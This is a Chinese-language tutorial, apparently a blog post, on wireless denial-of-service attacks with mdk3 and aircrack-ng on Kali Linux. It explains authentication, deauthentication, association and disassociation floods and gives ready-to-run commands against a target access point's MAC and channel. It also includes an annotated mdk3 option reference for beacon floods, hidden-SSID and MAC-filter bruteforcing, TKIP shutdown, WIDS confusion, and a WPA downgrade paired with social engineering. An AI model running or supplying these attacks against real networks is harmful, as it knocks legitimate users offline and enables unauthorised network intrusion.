mdk3 ----无线D.O.S攻击(拒绝服务攻击)

环境:kali linux 2017
工具:MDK3 aircrack-ng套件

1.关于无线连接验证有两种

    1)开放式密钥验证 
    2)预共享密钥验证  

2.关于无线客户端状态

1)没有通过验证,没有和AP建立关联      无线客户端处于搜索及试图连接AP阶段
2)通过验证,没有和AP建立关联          无线客户端已经输入正确的连接密码并等待
3)通过验证,和AP建立关联             无线客户端被允许链接(AP自动分配地址)

3.Auth Flood攻击

  Authentication Flood Attack(身份验证洪水攻击)
  攻击原理:
         1)客户端与AP建立连接
         2)发送伪造的客户端验证请求
         3)大量请求导致AP失去能力
         4)已连接的客户端被强制断开

攻击实现:

ps:排除干扰:  airmon-ng check kill
a.启用无线网卡Monitor(监听模式): airmon-ng start 网卡名    Example:airmon-ng start waln1  #ifconfig查看无线网卡名称
b.抓取当前无线网络状况: airodump-ng 网卡名 -c(可选项) 信道    Example:airodump-ng wlan1mon -c 6 #当前指定只抓取信道为6的AP
c.攻击: mdk3 网卡名 a -a AP的mac地址       Example:mdk3 wlan0mon a -a 00:1F:DD:60:C2:90

4.Deauth Flood攻击

Deauthentication Flood Attack(取消身份验证攻击)
攻击原理:1)客户端与AP建立连接
         2)通过广播插入伪造的取消身份认证报文
         3)客户端认为该报文来自AP
         4)已连接的客户端自行断开

攻击实现:

a.启用无线网卡Monitor
b.抓取当前无线网络状况
c.攻击:mdk3 网卡名 d -c 信道   example: mdk3 wlan0mon d -c 6

5.Association Flood攻击

Association Flood Attack(关联洪水攻击)
攻击原理:1)客户端与AP建立连接
         2)创建大量伪造的客户端关联
         3)大量请求导致AP失去能力
         4)已连接的客户端被强制断开

此类攻击的表现和Authentication Flood Attack很相似但是原理却有本质的不同
攻击实现:可参照Authentication Flood Attack攻击参数

6.Disassociation Flood攻击
Disassociation Flood Attack(取消关联洪水攻击)
攻击原理:Disassociation Flood Attack的攻击方式和Deauthentication Flood Attack(取消身份验证攻击)很相似但是发送的数据包的有本质不同
攻击实现:参照Deauthentication Flood Attack

PS:MDK3常用参数介绍

MDK USAGE:
mdk3   [test_options]   #mdk3用法:mdk3 网卡 测试模式 测试选项

TEST MODES:  #测试模式

b   - Beacon Flood Mode  #信标洪水模式 其实就是制造虚假AP干扰正常AP

      OPTIONS:
      -n    
         Use SSID  instead of randomly generated ones  #使用SSID 而不是随机生成的
      -f 
         Read SSIDs from file  #从文件中读取SSID
      -v 
         Read MACs and SSIDs from file.  #从文件读取MAC和SSID
      -d
         Show station as Ad-Hoc   #将站显示为Ad-Hoc
      -w
         Set WEP bit (Generates encrypted networks)  #设置WEP位(生成加密网络)
      -g
         Show station as 54 Mbit  # 显示工作站为54M
      -t
         Show station using WPA TKIP encryption  #使用WPA TKIP加密显示工作站
      -a
         Show station using WPA AES encryption    #使用WPA AES加密显示工作站
      -m
         Use valid accesspoint MAC from OUI database  #使用来自OUI数据库的有效访问点MAC
      -h
         Hop to channel where AP is spoofed    #跳到AP被欺骗的频道
         This makes the test more effective against some devices/drivers  #这使得测试对于某些设备/驱动程序更有效
         But it reduces packet rate due to channel hopping.  #但它减少了由于信道跳频的分组速率
      -c 
         Fake an AP on channel . If you want your card to hop on  #在频道上创建AP。如果你想要你的卡上跳
         this channel, you have to set -h option, too!  #这个通道,你必须设置-h选项!
      -s 
         Set speed in packets per second (Default: 50)  #设置速度(以秒为单位)(默认值:50)
a   - Authentication DoS mode   # 身份验证洪水攻击 

      OPTIONS:
      -a 
         Only test the specified AP  #只测试指定的AP
      -m
         Use valid client MAC from OUI database  #从OUI数据库使用有效的客户端MAC
      -c
         Do NOT check for test being successful   #不要检查测试是否成功
      -i 
         Perform intelligent test on AP (-a and -c will be ignored)  #在AP上执行智能测试(-a和-c将被忽略)
         This test connects clients to the AP and reinjects sniffed data to keep them alive  #此测试将客户端连接到AP,并重新注入嗅探的数据以保持活动
      -s 
         Set speed in packets per second (Default: unlimited)  #设置速度(以每秒包数为单位)(默认值:无限制)
p   - Basic probing and ESSID Bruteforce mode  #基本探测和ESSID Bruteforce模式

      Use -f and -t option to enable SSID Bruteforcing.  #使用-f和-t选项来启用SSID Bruteforcing。
      OPTIONS:
      -e 
         Tell mdk3 which SSID to probe for # 告诉mdk3要探测的SSID
      -f 
         Read lines from file for bruteforcing hidden SSIDs  #从文件中读取行以强制执行隐藏的SSID
      -t 
         Set MAC adress of target AP  #设置目标AP的MAC地址
      -s 
         Set speed (Default: unlimited, in Bruteforce mode: 300)  # 设置速度(默认值:无限制,在Bruteforce模式下:300)
      -b <character set> 
         Use full Bruteforce mode (recommended for short SSIDs only!) #使用完全的Bruteforce模式(建议只使用短SSID!)
         Use this switch only to show its help screen.  #使用此开关仅显示其帮助屏幕

         d   - Deauthentication / Disassociation Amok Mode  #Deauthentication / Disassociation攻击模式
      Kicks everybody found from AP  #踢掉每个客户端
      OPTIONS:
      -w 
         Read file containing MACs not to care about (Whitelist mode)  #白名单模式 读取包含MAC的文件以运行测试
      -b 
         Read file containing MACs to run test on (Blacklist Mode)  #黑名单模式 读取文件中的运行测试MAC运行测试
      -s 
         Set speed in packets per second (Default: unlimited) #设置速度(以每秒包数为单位)(默认值:无限制)
      -c [chan,chan,chan,...]  
         Enable channel hopping. Without providing any channels, mdk3 will hop an all  #设置信道跳跃如果没指定,mdk3会跳一个
         14 b/g channels. Channel will be changed every 5 seconds.   #14 b / g通道。信道每5秒更改一次
m   - Michael shutdown exploitation (TKIP)   #MAC关闭利用
      Cancels all traffic continuously   #连续取消所有流量
      -t 
         Set Mac address of target AP  #设置目标AP的Mac地址
      -w 
         Seconds between bursts (Default: 10)  #突发之间的秒数(默认值:10)
      -n 
         Set packets per burst (Default: 70)  #设置每个数据包的数据包(默认值:70)
      -j
         Use the new TKIP QoS-Exploit    #使用新的TKIP QoS-Exploit
         Needs just a few packets to shut AP down!  #需要几个数据包才能关闭AP!
      -s 
         Set speed (Default: 400)   #设置速度(默认值:400)

w   - WIDS/WIPS/WDS Confusion
      将WDS与多认证客户端混淆,从而弄乱路由表
      -e 
         SSID of target WDS network  #目标WDS网络的SSID
      -c [chan,chan,chan...]   
         Use channel hopping  #使用信道跳跃
      -z
        激活Zero_Chaos的WIDS攻击
         (验证客户端从WDS到外部AP,使WIDS变得坚果)
f   - MAC filter bruteforce mode  #MAC过滤器强制模式
      此测试使用已知客户端MAC地址的列表,并尝试
      在动态改变的同时向给定AP认证它们
      其响应超时以获得最佳性能。它目前只工作
      对正确拒绝开放身份验证请求的AP
      -t 
         Target BSSID  #目标BSSID
      -m 
         Set the MAC adress range to use (3 bytes, i.e. 00:12:34)   #设置要使用的MAC地址范围(3字节,即00:12:34)
         Without -m, the internal database will be used  #如果没有-m,将使用内部数据库
      -f 
         Set the MAC adress to begin bruteforcing with  #设置MAC地址以开始强制
         (Note: You can't use -f and -m at the same time)  #(注意:不能同时使用-f和-m)
g   - WPA Downgrade test  #WPA降级测试
      deauthenticates发送WPA加密数据包的站和AP。
      有了这个测试,你可以检查sysadmin是否会尝试设置他的
      网络到WEP或禁用加密。 mdk3将使WEP和未加密
      客户端工作,所以如果系统管理员只是认为“WPA是破碎”他
      肯定不是这个工作的正确。
      (这可以/应该与社会工程相结合)
      -t 
         Target network  #目标网络

你可能感兴趣的:(无线-O-S,linux,无线渗透)